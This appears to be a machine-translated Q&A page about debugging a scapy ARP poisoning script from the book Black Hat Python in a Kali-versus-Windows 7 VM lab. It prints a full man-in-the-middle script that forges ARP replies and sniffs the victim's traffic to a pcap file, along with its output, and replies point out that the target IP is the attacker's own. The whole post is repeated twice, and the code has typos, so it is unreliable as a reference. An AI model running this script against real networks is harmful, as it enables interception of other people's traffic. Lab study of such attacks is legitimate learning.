scapy 的 ARP 中毒:未能获得目标 MAC
ARP Poisoning with scapy: Failure to get target MAC
在 Justin Seitz Black Hat Python 一书的第四章中,该部分详细介绍了使用 scapy 进行 ARP 中毒。我在获取目标 machine 的目标 ip 的 mac 地址时遇到问题。我使用 Kali VM 作为攻击 machine,使用 Win 7 VM 作为目标 machine。
from scapy.all import *
import os
import sys
import threading
import signal
interface = "eth0"
target_ip = "10.0.2.15"
gateway_ip = "10.0.2.2"
packet_count = 1000
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
print "[*} Restoring target..."
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
send(Arp(op=2, psrc=target_ip, pdst=gateway_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)
os.kill(os.getpid(), signal.SIGINT)
def get_mac(ip_address):
responses, unanswered = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=2, retry=10)
for s, r in responses:
return r[Ether].src
return None
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
posion_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print "[*] ARP poison attack finished."
return
conf.iface = interface
conf.iface = interface
conf.verb = 0
print "[*] Setting up %s" % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip, target_mac)
poison_thread = threading.Thread(target=posion_target, args=(
gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "ip host %s" % target_ip
packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
wrpcap('arper.pcap', packets)
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
sys.exit(0)
攻击machine:
root@kali:~/Documents# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe81:b1df prefixlen 64 scopeid 0x20<link>
ether 08:00:27:81:b1:df txqueuelen 1000 (Ethernet)
RX packets 101529 bytes 101906744 (97.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34775 bytes 3530239 (3.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 218 bytes 13972 (13.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 218 bytes 13972 (13.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
输出:
root@kali:~/Documents# sudo python arper.py
[*] Setting up eth0
[*] Gateway 10.0.2.2 is at 52:54:00:12:35:02
[!!!] Failed to get target MAC. Exiting.
你使用kali(攻击机器)的IP作为target_ip(10.0.2.15)。 Win 在同一台计算机上运行,但是在虚拟机中运行,通常虚拟机有自己的 IP ( https://www.quora.com/Do-virtual-machines-have-their-own-IP )
甚至不确定虚拟机上的Win是否自动在同一网络上。在同一 /24 网络(即 10.0.2.x/24 - 替换 x )中为 VM 和 kali 分配静态 IP,请参阅 https://serverfault.com/questions/839443/giving-the-vm-an-own-ip-address
coder 是对的:首先通过 ping
检查网络连接是否建立
在 Justin Seitz Black Hat Python 一书的第四章中,该部分详细介绍了使用 scapy 进行 ARP 中毒。我在获取目标 machine 的目标 ip 的 mac 地址时遇到问题。我使用 Kali VM 作为攻击 machine,使用 Win 7 VM 作为目标 machine。
from scapy.all import *
import os
import sys
import threading
import signal
interface = "eth0"
target_ip = "10.0.2.15"
gateway_ip = "10.0.2.2"
packet_count = 1000
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
print "[*} Restoring target..."
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
send(Arp(op=2, psrc=target_ip, pdst=gateway_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)
os.kill(os.getpid(), signal.SIGINT)
def get_mac(ip_address):
responses, unanswered = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=2, retry=10)
for s, r in responses:
return r[Ether].src
return None
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
posion_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print "[*] ARP poison attack finished."
return
conf.iface = interface
conf.iface = interface
conf.verb = 0
print "[*] Setting up %s" % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip, target_mac)
poison_thread = threading.Thread(target=posion_target, args=(
gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "ip host %s" % target_ip
packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
wrpcap('arper.pcap', packets)
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
sys.exit(0)
攻击machine:
root@kali:~/Documents# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe81:b1df prefixlen 64 scopeid 0x20<link>
ether 08:00:27:81:b1:df txqueuelen 1000 (Ethernet)
RX packets 101529 bytes 101906744 (97.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34775 bytes 3530239 (3.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 218 bytes 13972 (13.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 218 bytes 13972 (13.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
输出:
root@kali:~/Documents# sudo python arper.py
[*] Setting up eth0
[*] Gateway 10.0.2.2 is at 52:54:00:12:35:02
[!!!] Failed to get target MAC. Exiting.
你使用kali(攻击机器)的IP作为target_ip(10.0.2.15)。 Win 在同一台计算机上运行,但是在虚拟机中运行,通常虚拟机有自己的 IP ( https://www.quora.com/Do-virtual-machines-have-their-own-IP )
甚至不确定虚拟机上的Win是否自动在同一网络上。在同一 /24 网络(即 10.0.2.x/24 - 替换 x )中为 VM 和 kali 分配静态 IP,请参阅 https://serverfault.com/questions/839443/giving-the-vm-an-own-ip-address
coder 是对的:首先通过 ping
检查网络连接是否建立